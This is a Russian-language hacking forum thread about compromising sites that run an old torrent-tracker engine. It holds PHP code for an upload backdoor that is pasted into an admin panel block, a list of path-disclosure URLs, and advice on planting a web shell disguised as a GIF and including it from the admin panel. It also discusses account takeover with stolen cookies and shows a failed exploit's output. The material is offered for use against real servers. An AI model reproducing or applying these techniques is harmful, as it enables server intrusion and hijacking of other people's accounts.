Code: $self = $_SERVER['PHP_SELF']; $docr = $_SERVER['DOCUMENT_ROOT']; $sern = $_SERVER['SERVER_NAME']; $tend = "</tr></form></table><br><br><br><br>"; if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} else {$ac = "upload";} switch($ac) { case "upload": echo <<<HTML <table> <form enctype="multipart/form-data" action="$self" method="POST"> <input type="hidden" name="ac" value="upload"> <tr> <input size="5" name="file" type="file"></td> </tr> <tr> <td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td> $tend HTML; if (isset($_POST['path'])){ $uploadfile = $_POST['path'].$_FILES['file']['name']; if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} if (copy($_FILES['file']['tmp_name'], $uploadfile)) { echo "Файло ".$_FILES['file']['name']." загружен"; } else { print "Не удаётся загрузить файло. Инфа:\n"; print_r($_FILES); } } break; } ?> </pre> Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.
Раскрытие путей: Code: recover.php?id[]= email-gateway.php?id[]= takeconfirm.php?id[]= takeinvite.php?id[]= topten.php?lim[]= topten.php?type[]=
Подскажите, пожалуйста, способ залить шелл, зайдя в админку. Способ через php-блок не катит, т.к. на папке выставлены права не позволяющие в неё писать ((( Если можно подробно.
Не обязательно 777 иногда скрипт принудительно записывает блок хоть и ругается на отсутствие прав нл это как уже упоминалось выше- как повезет
? у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self что не так я делаю?
Лучше залей гифный шелл и с инклудь его с админки Смени расширение шелла с php на gif залей на серв в админке создай php блок и сунь туда этот код например так include("torrents/images/44776.gif"); потом выставляешь отображение блока на какой нить странице и вуаля на той страничке откроется шелл
Это для старой версии сделано... На новой я не тестил.. У нас в локале повальное распространение старого двига Серверов 100 наверно и все на одном двиге=)
Подскажите как через куки зайти? Взял я его куки со своей базы. Открываю его сайт(куки) Ид меняю на его и куки его ставлю! Обновляю страницу и я становлюсь как гость, вылетаю из под акка! Почему?? Обьяснить что не так
что то мне кажется не так по експлой запускаешь и получаешь ответ. Trying to get your cookies... [DONE] Trying to get passhash: Exploit failed